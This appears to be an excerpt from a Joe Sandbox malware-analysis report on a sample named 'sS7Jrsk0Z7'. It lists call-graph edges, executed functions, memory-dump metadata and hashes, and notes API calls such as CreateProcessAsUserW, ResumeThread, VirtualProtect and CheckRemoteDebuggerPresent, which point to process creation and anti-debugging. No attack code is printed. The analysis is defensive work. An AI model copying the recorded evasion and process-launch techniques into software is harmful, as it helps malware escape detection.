64090 5002681 GetModuleHandleW 64087->64090 64088 50025a7 64088->64069 64089->64088 64090->64088 64092 50026c4 64091->64092 64093 50026a1 64091->64093 64092->64084 64093->64092 64094 50028c8 GetModuleHandleW 64093->64094 64095 50028f5 64094->64095 64095->64084 64097 50026a1 64096->64097 64098 50026c4 64096->64098 64097->64098 64099 50028c8 GetModuleHandleW 64097->64099 64098->64084 64100 50028f5 64099->64100 64100->64084 64102 5003715 64101->64102 64103 500374f 64102->64103 64109 50034bc 64102->64109 64103->64073 64106 5003708 64105->64106 64107 50034bc CreateWindowExW 64106->64107 64108 500374f 64106->64108 64107->64108 64108->64073 64110 50034c7 64109->64110 64112 5004060 64110->64112 64113 50035e4 64110->64113 64112->64112 64114 50035ef 64113->64114 64118 5005f00 64114->64118 64124 5005ee8 64114->64124 64115 5004109 64115->64112 64119 5005f3d 64118->64119 64120 5005f31 64118->64120 64119->64115 64120->64119 64130 5006c30 64120->64130 64134 5006c23 64120->64134 64138 5006c21 64120->64138 64126 5005f00 64124->64126 64125 5005f3d 64125->64115 64126->64125 64127 5006c30 CreateWindowExW 64126->64127 64128 5006c21 CreateWindowExW 64126->64128 64129 5006c23 CreateWindowExW 64126->64129 64127->64125 64128->64125 64129->64125 64131 5006c5b 64130->64131 64132 5006d0a 64131->64132 64142 5007f47 64131->64142 64136 5006c30 64134->64136 64135 5006d0a 64135->64135 64136->64135 64137 5007f47 CreateWindowExW 64136->64137 64137->64135 64139 5006c24 64138->64139 64140 5006d0a 64139->64140 64141 5007f47 CreateWindowExW 64139->64141 64141->64140 64143 5007f22 64142->64143 64143->64142 64144 5007f30 64143->64144 64145 5008013 CreateWindowExW 64143->64145 64144->64132 64146 5008074 64145->64146 64146->64146 64018 901ec90 64019 901ecd0 ResumeThread 64018->64019 64021 901ed01 64019->64021 64147 9016a50 64148 9016a93 64147->64148 64149 9016ec1 64148->64149 64151 9019710 64148->64151 64152 9019737 64151->64152 64153 90197fb 64152->64153 64155 901bbb8 64152->64155 64153->64148 64156 901bc37 CreateProcessAsUserW 64155->64156 64158 901bd38 64156->64158 64037 798ca20 64038 798ca68 VirtualProtect 64037->64038 64039 798caa2 64038->64039 64159 7803658 64161 7803677 64159->64161 64162 78016c8 64159->64162 64163 78016d3 64162->64163 64165 10bc4cc 3 API calls 64163->64165 64164 78036fc 64164->64161 64165->64164 64040 2b21608 CloseHandle 64041 2b2166f 64040->64041 64172 10bcc70 64175 10bc47c 64172->64175 64174 10bcc7d 64176 10bc487 64175->64176 64179 10bc4ac 64176->64179 64178 10bcd1a 64178->64174 64180 10bc4b7 64179->64180 64181 10bc4cc 3 API calls 64180->64181 64182 10bce2b 64181->64182 64182->64178 64183 e1d01c 64185 e1d034 64183->64185 64184 e1d08e 64185->64184 64190 5008108 64185->64190 64194 50073ac 64185->64194 64203 5008e5a 64185->64203 64212 50080f8 64185->64212 64191 500812e 64190->64191 64192 50073ac CallWindowProcW 64191->64192 64193 500814f 64192->64193 64193->64184 64197 50073b7 64194->64197 64195 5008ec9 64199 5008ec7 64195->64199 64232 50074d4 64195->64232 64197->64195 64198 5008eb9 64197->64198 64216 5008fe0 64198->64216 64221 50090bc 64198->64221 64227 5008ff0 64198->64227 64204 5008e68 64203->64204 64205 5008ec9 64204->64205 64207 5008eb9 64204->64207 64206 50074d4 CallWindowProcW 64205->64206 64208 5008ec7 64205->64208 64206->64208 64209 5008fe0 CallWindowProcW 64207->64209 64210 5008ff0 CallWindowProcW 64207->64210 64211 50090bc CallWindowProcW 64207->64211 64209->64208 64210->64208 64211->64208 64213 5008108 64212->64213 64214 50073ac CallWindowProcW 64213->64214 64215 500814f 64214->64215 64215->64184 64218 5009004 64216->64218 64217 5009090 64217->64199 64236 50090a8 64218->64236 64239 5009099 64218->64239 64222 500907a 64221->64222 64223 50090ca 64221->64223 64225 50090a8 CallWindowProcW 64222->64225 64226 5009099 CallWindowProcW 64222->64226 64224 5009090 64224->64199 64225->64224 64226->64224 64229 5009004 64227->64229 64228 5009090 64228->64199 64230 50090a8 CallWindowProcW 64229->64230 64231 5009099 CallWindowProcW 64229->64231 64230->64228 64231->64228 64233 50074df 64232->64233 64234 500a5aa CallWindowProcW 64233->64234 64235 500a559 64233->64235 64234->64235 64235->64199 64237 50090b9 64236->64237 64243 500a4e1 64236->64243 64237->64217 64240 50090a8 64239->64240 64241 50090b9 64240->64241 64242 500a4e1 CallWindowProcW 64240->64242 64241->64217 64242->64241 64244 50074d4 CallWindowProcW 64243->64244 64245 500a4fa 64244->64245 64245->64237

                                                                                                              Executed Functions

                                                                                                              Function 010B8030 Relevance: 12.2, Strings: 9, Instructions: 906COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (oq$(oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                                              • API String ID: 0-746337618
                                                                                                              • Opcode ID: f9cf1b9773b2ca8caac624a44a3e6d85523caa057256960ef1997e5f4c198261
                                                                                                              • Instruction ID: c20252193247d71032050ba524059c88f63bef529d433b8671a4bdd315d502b8
                                                                                                              • Opcode Fuzzy Hash: f9cf1b9773b2ca8caac624a44a3e6d85523caa057256960ef1997e5f4c198261
                                                                                                              • Instruction Fuzzy Hash: B8825870A00209DFDB15CF68D984AEEBBFABF88310F15C59AE5859B2A1D730EC41CB54
                                                                                                              Function 010B72F0 Relevance: 8.4, Strings: 6, Instructions: 888COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (oq$(oq$(oq$,q$,q$Hq
                                                                                                              • API String ID: 0-894188343
                                                                                                              • Opcode ID: 897928d746e2ae84c3641a7d7f9f78824d1ed9633e94ee6f3a82e6cdba98acea
                                                                                                              • Instruction ID: e475157169e2479fd4e781918965b99efa801d149dd988bb2f31b6d669dfdaf0
                                                                                                              • Opcode Fuzzy Hash: 897928d746e2ae84c3641a7d7f9f78824d1ed9633e94ee6f3a82e6cdba98acea
                                                                                                              • Instruction Fuzzy Hash: 1D724970A002098FDB15DF69D884AAEBBF6FFC8300F148469E955AB3A5DB34DD41CB50
                                                                                                              Function 078B4790 Relevance: 5.5, Instructions: 5513COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1244 78b4790-78b4792 1245 78b479b-78b479e 1244->1245 1246 78b4794-78b479a 1244->1246 1247 78b47a3-78b49ce 1245->1247 1246->1245 1246->1247 1274 78b698f-78b6c2f 1247->1274 1275 78b49d4-78b5752 1247->1275 1342 78b7b96-78b8a94 1274->1342 1343 78b6c35-78b7b8e 1274->1343 1698 78b5a48-78b6987 1275->1698 1699 78b5758-78b5a40 1275->1699 1899 78b8a9a-78b8dd1 1342->1899 1900 78b8dd9-78b8dec 1342->1900 1343->1342 1698->1274 1699->1698 1899->1900 1904 78b8df2-78b943c 1900->1904 1905 78b9444-78ba405 1900->1905 1904->1905 2304 78ba405 call 78bbc18 1905->2304 2305 78ba405 call 78bbbe3 1905->2305 2303 78ba40b-78ba412 2304->2303 2305->2303
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aee41f1e2bc2d5350dcd5da78d937db7729fccbbf47e1ac0eefc34b19a6b3a4c
                                                                                                              • Instruction ID: fc06424a4a48916f58e62965a3407f90af363ab0dbd1f4f496e002d49e0b5c66
                                                                                                              • Opcode Fuzzy Hash: aee41f1e2bc2d5350dcd5da78d937db7729fccbbf47e1ac0eefc34b19a6b3a4c
                                                                                                              • Instruction Fuzzy Hash: 31B3FC70A11628CFCB58EF78D98966CBBF2AF89300F4045E9D049A7764DE389D84CF56
                                                                                                              Function 078B47A0 Relevance: 5.5, Instructions: 5506COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2306 78b47a0-78b49ce 2334 78b698f-78b6c2f 2306->2334 2335 78b49d4-78b5752 2306->2335 2402 78b7b96-78b8a94 2334->2402 2403 78b6c35-78b7b8e 2334->2403 2758 78b5a48-78b6987 2335->2758 2759 78b5758-78b5a40 2335->2759 2959 78b8a9a-78b8dd1 2402->2959 2960 78b8dd9-78b8dec 2402->2960 2403->2402 2758->2334 2759->2758 2959->2960 2964 78b8df2-78b943c 2960->2964 2965 78b9444-78ba405 2960->2965 2964->2965 3364 78ba405 call 78bbc18 2965->3364 3365 78ba405 call 78bbbe3 2965->3365 3363 78ba40b-78ba412 3364->3363 3365->3363
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 26e5297fb308c38b524c322a7aeaf38a5fd4b9af296b9b46b8b1bf98df2ff417
                                                                                                              • Instruction ID: be7313bf008df26697b5868d28772815ad0c47ef4e7bc3f4c7a0b77f895b41a5
                                                                                                              • Opcode Fuzzy Hash: 26e5297fb308c38b524c322a7aeaf38a5fd4b9af296b9b46b8b1bf98df2ff417
                                                                                                              • Instruction Fuzzy Hash: C3B3FC70A11628CFCB58EF78D98966CBBF2AF89300F4045E9D049A7764DE389D84CF56
                                                                                                              Function 076D4418 Relevance: 5.2, Instructions: 5220COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 4492 76d4418-76d4689 5460 76d468b call 76dace0 4492->5460 5461 76d468b call 76dacf0 4492->5461 4520 76d4691-76d9bca call 76db390 5459 76d9bd0-76d9bd7 4520->5459 5460->4520 5461->4520
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810087104.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_76d0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9803396ab825fd829c6f15d8cdbfc6e8eb2355b5fd4df721754bc81aebc81448
                                                                                                              • Instruction ID: a4a3fda4cd956781fc6103c52ef42c0a25fe927201f768de3f79abee1383d478
                                                                                                              • Opcode Fuzzy Hash: 9803396ab825fd829c6f15d8cdbfc6e8eb2355b5fd4df721754bc81aebc81448
                                                                                                              • Instruction Fuzzy Hash: 5EB30570E152188BCB54EF79D99966CBBF2BF89300F0085E9D48AA3364DE389D85CF51
                                                                                                              Function 0901C280 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 5463 901c280-901c2a5 5464 901c2a7 5463->5464 5465 901c2ac-901c2d0 5463->5465 5464->5465 5466 901c2d1 5465->5466 5467 901c2d8-901c2f4 5466->5467 5468 901c2f6 5467->5468 5469 901c2fd-901c2fe 5467->5469 5468->5466 5468->5469 5470 901c4c3-901c4f6 call 9015c10 5468->5470 5471 901c303-901c327 5468->5471 5472 901c523-901c52c 5468->5472 5473 901c329-901c33a 5468->5473 5474 901c42d 5468->5474 5475 901c350-901c358 5468->5475 5476 901c3f2-901c425 call 901a478 5468->5476 5477 901c515-901c51e 5468->5477 5478 901c456-901c459 5468->5478 5479 901c396-901c3ae 5468->5479 5480 901c478-901c490 5468->5480 5481 901c3da-901c3ed 5468->5481 5482 901c4fe-901c510 5468->5482 5469->5472 5470->5482 5471->5467 5501 901c35a-901c35c 5473->5501 5502 901c33c-901c34e 5473->5502 5486 901c436-901c451 5474->5486 5484 901c35f-901c36a 5475->5484 5476->5474 5477->5467 5488 901c462-901c473 5478->5488 5497 901c3c1-901c3c8 5479->5497 5498 901c3b0-901c3bf 5479->5498 5499 901c4a3-901c4aa 5480->5499 5500 901c492-901c4a1 5480->5500 5481->5467 5482->5467 5493 901c37d-901c384 5484->5493 5494 901c36c-901c37b 5484->5494 5486->5467 5488->5467 5496 901c38b-901c391 5493->5496 5494->5496 5496->5467 5504 901c3cf-901c3d5 5497->5504 5498->5504 5505 901c4b1-901c4be 5499->5505 5500->5505 5501->5484 5502->5467 5504->5467 5505->5467
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: e\1$e\1$"*p$"*p
                                                                                                              • API String ID: 0-1513742261
                                                                                                              • Opcode ID: a34d2c8f9cc82d359e97241028fb01b296afb3e606c0fc380f657ac70f398202
                                                                                                              • Instruction ID: 457ce9a996d949f294d3ab5dfb9b90fd902c39e84eef3f7367f9fb1ca0d32c4c
                                                                                                              • Opcode Fuzzy Hash: a34d2c8f9cc82d359e97241028fb01b296afb3e606c0fc380f657ac70f398202
                                                                                                              • Instruction Fuzzy Hash: 748132B0D452288FDB14CFE5D9446EEBBF2BF89340F20942AD416BB214D7748A41CF98
                                                                                                              Function 07983CBA Relevance: 4.4, Strings: 1, Instructions: 3195COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 5593 7983cba-7983cbd 5594 7983cbf-7983cd4 5593->5594 5595 7983c83-7983c86 5593->5595 5596 7983cec-7983d3a 5594->5596 5597 7983cd6-7983cea 5594->5597 6252 7983c87 call 7983cba 5595->6252 6253 7983c87 call 7987850 5595->6253 5599 7983d3c-7983d41 5596->5599 5600 7983d43-7983d46 5596->5600 5597->5596 5598 7983c8d-7983c94 5599->5600 5601 7983d4b-7983e48 5599->5601 5600->5601 5613 7983e4e-7983f89 5601->5613 5614 7983f91-7983f93 5601->5614 5613->5614 5615 7983f9a-7983faa 5614->5615 5616 7983f95-7983f98 5614->5616 5622 7983fac-7983fbd 5615->5622 5623 7983fbf-7983fd5 5615->5623 5618 7983fd8-79853c4 5616->5618 5881 7987078 5618->5881 5882 79853ca-798543a 5618->5882 5622->5618 5623->5618 5883 798707d-7987096 5881->5883 6249 798543c call 7987e3f 5882->6249 6250 798543c call 7987e40 5882->6250 6251 798543c call 7987dd0 5882->6251 5891 7985442-7985658 5916 798565e-798574b 5891->5916 5917 7985750-7985854 5891->5917 5938 7985857-7986d72 5916->5938 5917->5938 5938->5883 6210 7986d78-7986d93 5938->6210 6254 7986d95 call 10b58d8 6210->6254 6255 7986d95 call 10b57a0 6210->6255 6211 7986d9a-7986ea9 6211->5883 6223 7986eaf-7986eb4 6211->6223 6224 7986ed3-7987007 6223->6224 6225 7986eb6-7986ece 6223->6225 6224->5883 6245 7987009-798703c 6224->6245 6226 7987042-7987077 6225->6226 6245->6226 6249->5891 6250->5891 6251->5891 6252->5598 6253->5598 6254->6211 6255->6211
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: F
                                                                                                              • API String ID: 0-1304234792
                                                                                                              • Opcode ID: 17dbd4b944b2611949fcfc1845753523d72a55a3243e57bc84250cb1fb97f3ef
                                                                                                              • Instruction ID: e98da0ba0fe67f8e865159d76fbe5294e0f529d79dd1d80fb82f2890dcb4dd6a
                                                                                                              • Opcode Fuzzy Hash: 17dbd4b944b2611949fcfc1845753523d72a55a3243e57bc84250cb1fb97f3ef
                                                                                                              • Instruction Fuzzy Hash: E3534E70A143148FCB54FFB8E88975DBBB2AF88300F5085E9D449A3355DA38AE98CF55
                                                                                                              Function 09014BF8 Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6f$6f$$q
                                                                                                              • API String ID: 0-2870187524
                                                                                                              • Opcode ID: 260804410afc4d44132225d5f5daf8d3246f8887c5f6f25c9650860b93211faa
                                                                                                              • Instruction ID: dc3d70b10aadb7b4aafdab4d85e93185380e546c6891333221e5b2ff02ba9e51
                                                                                                              • Opcode Fuzzy Hash: 260804410afc4d44132225d5f5daf8d3246f8887c5f6f25c9650860b93211faa
                                                                                                              • Instruction Fuzzy Hash: A471D0B4E00218DFDB54CFA5D5855EEBBB2FF89301F20942AE80AAB364DB345981CF51
                                                                                                              Function 0780FA88 Relevance: 2.9, Strings: 2, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810511109.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7800000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$PHq
                                                                                                              • API String ID: 0-3639488057
                                                                                                              • Opcode ID: e8164df042b5071cb1d9d2402e44bb1422c5ab2e5b4a078619e7e283496d22d5
                                                                                                              • Instruction ID: 1c25c5b836cd099f4b76ee0c314fc626b138e3b98f59c2061a626e0a7c3db10e
                                                                                                              • Opcode Fuzzy Hash: e8164df042b5071cb1d9d2402e44bb1422c5ab2e5b4a078619e7e283496d22d5
                                                                                                              • Instruction Fuzzy Hash: 86F15C74A002058FDB64DF68C859BADBBF2BF89320F14C569D516EB3A1CB34A845CB91
                                                                                                              Function 076DBEE0 Relevance: 2.8, Strings: 1, Instructions: 1598COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810087104.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_76d0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: k@
                                                                                                              • API String ID: 0-1332332647
                                                                                                              • Opcode ID: 12c914c88252b24515506ce2d7d808ec7a3da1d0c41c059ad0c94794d00a481d
                                                                                                              • Instruction ID: 794aad68030400704b5cc0ea91317f5a3486296f6e84c7282d77bff1d1bf7ee5
                                                                                                              • Opcode Fuzzy Hash: 12c914c88252b24515506ce2d7d808ec7a3da1d0c41c059ad0c94794d00a481d
                                                                                                              • Instruction Fuzzy Hash: C2D2F271E153048FC705FBB8D89876DBFB2AF89300F4545AAD486E73A5DA389C48CB61
                                                                                                              Function 0798D6CA Relevance: 2.7, Strings: 2, Instructions: 225COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq$Teq
                                                                                                              • API String ID: 0-2938103587
                                                                                                              • Opcode ID: 459423273eb13a453701fd066abaf2345be540bc82c2eecdf2ff274909f3102a
                                                                                                              • Instruction ID: 9b34c99e3cbbd982debdffc69341dd03762751fa39296a72058dbd0d2553cbbf
                                                                                                              • Opcode Fuzzy Hash: 459423273eb13a453701fd066abaf2345be540bc82c2eecdf2ff274909f3102a
                                                                                                              • Instruction Fuzzy Hash: 9C9103B5E052098FDB44CFAAC884ADEBBB2BF89310F14942AD419BB368D7749945CF50
                                                                                                              Function 0798D6F0 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq$Teq
                                                                                                              • API String ID: 0-2938103587
                                                                                                              • Opcode ID: 889bfc7a8cb14071923da62362576990a1a89c98632232f20471f2c349a048d3
                                                                                                              • Instruction ID: 22997789d7ed8923727211983eb6d29569d531f7ef224e376b9a7ded02f4e633
                                                                                                              • Opcode Fuzzy Hash: 889bfc7a8cb14071923da62362576990a1a89c98632232f20471f2c349a048d3
                                                                                                              • Instruction Fuzzy Hash: 8391F2B4E002099FDB48DFAAC880A9EFBB2FF89310F14942AD419BB358D77499458F50
                                                                                                              Function 09014BE9 Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6f$$q
                                                                                                              • API String ID: 0-559323919
                                                                                                              • Opcode ID: 6958b8b7ab6891440dec6d871cb4d644ab376f4def3991e02c743864b84a3917
                                                                                                              • Instruction ID: fb38a504f30607bc8cf50b270806a5473fb24a8c9109036ea8d6ad5ff69d7e14
                                                                                                              • Opcode Fuzzy Hash: 6958b8b7ab6891440dec6d871cb4d644ab376f4def3991e02c743864b84a3917
                                                                                                              • Instruction Fuzzy Hash: BD71D274E00218DFDB54CFA5D4956EEBBB2FF89301F20942AE80AAB364DB345985CF51
                                                                                                              Function 0901BBB8 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0901BD23
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1811136870.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_9010000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcessUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2217836671-0
                                                                                                              • Opcode ID: c2f86baf16fa796941a32dfe1644b31cad2fef0034492602ebfed6c0ee1d2e30
                                                                                                              • Instruction ID: 5182e4b6662dc1dadf35a3110c863a4ec17daa17cbc089c376296787838345b0
                                                                                                              • Opcode Fuzzy Hash: c2f86baf16fa796941a32dfe1644b31cad2fef0034492602ebfed6c0ee1d2e30
                                                                                                              • Instruction Fuzzy Hash: 2051D3B1D002699FDB24CF99C840BDDBBF5BF48310F0484AAE909B7254DB759A85CF90
                                                                                                              Function 0500BC6C Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 0500F35F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1806590670.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_5000000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CheckDebuggerPresentRemote
                                                                                                              • String ID:
                                                                                                              • API String ID: 3662101638-0
                                                                                                              • Opcode ID: 9abc19104f44daa1afe35f0427ddbcce6c8bd4e306f136c5821809e9c408e007
                                                                                                              • Instruction ID: 7bf82bc8c5da2104c71c98241370f08a4976f81b39df2fca11a975ad7e1db42a
                                                                                                              • Opcode Fuzzy Hash: 9abc19104f44daa1afe35f0427ddbcce6c8bd4e306f136c5821809e9c408e007
                                                                                                              • Instruction Fuzzy Hash: 2A2136B2C012599FDB24CF9AD484BEEBBF4BF48320F14841AE855A7280D778A944CF65
                                                                                                              Function 0798F7E0 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: kQD
                                                                                                              • API String ID: 0-3066535408
                                                                                                              • Opcode ID: 770cd1ce2242af77775dd3f433055ec9071fa1c611aadc77cd8e7ed4a81df16e
                                                                                                              • Instruction ID: e166ae4efdc808dece02c8d18fb4e5be2a7cc16a27c4a1180dbd50d4fdf7474b
                                                                                                              • Opcode Fuzzy Hash: 770cd1ce2242af77775dd3f433055ec9071fa1c611aadc77cd8e7ed4a81df16e
                                                                                                              • Instruction Fuzzy Hash: 79C128B4D1021ADFCB44DF95C5848AEFBB2FF8A300F64A559C816BB214D734A982CF94
                                                                                                              Function 07987E40 Relevance: 1.4, Instructions: 1438COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f8a901f631f3df0b413191e3742f3f54ad057c604ce387fd35fed224c5f472e1
                                                                                                              • Instruction ID: 75c187cd481d34965f22d61d309299f4e797674345f67dd075d417d6a16de0e5
                                                                                                              • Opcode Fuzzy Hash: f8a901f631f3df0b413191e3742f3f54ad057c604ce387fd35fed224c5f472e1
                                                                                                              • Instruction Fuzzy Hash: 6CC29471A143188BC745FBB8E8897ADBBB2FF48300F4485A9D449A3394DE38ED58CB51
                                                                                                              Function 0798DF69 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7980000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: >NG
                                                                                                              • API String ID: 0-1926143806
                                                                                                              • Opcode ID: 247029896fbbd961de256d767cd481002c9e74690a8fb957d8510c6cd5a8cbbd
                                                                                                              • Instruction ID: 76b1ee203ddd107c4784cad42c964744772fb98ee7cede2c964ad3d249bbc556
                                                                                                              • Opcode Fuzzy Hash: 247029896fbbd961de256d767cd481002c9e74690a8fb957d8510c6cd5a8cbbd
                                                                                                              • Instruction Fuzzy Hash: 68516AB0E14219CFDB48CFA9C5906AEFBF2BF8A304F24C42AD419B7254D7748A418F64
                                                                                                              Function 0798BA38 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810753200.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
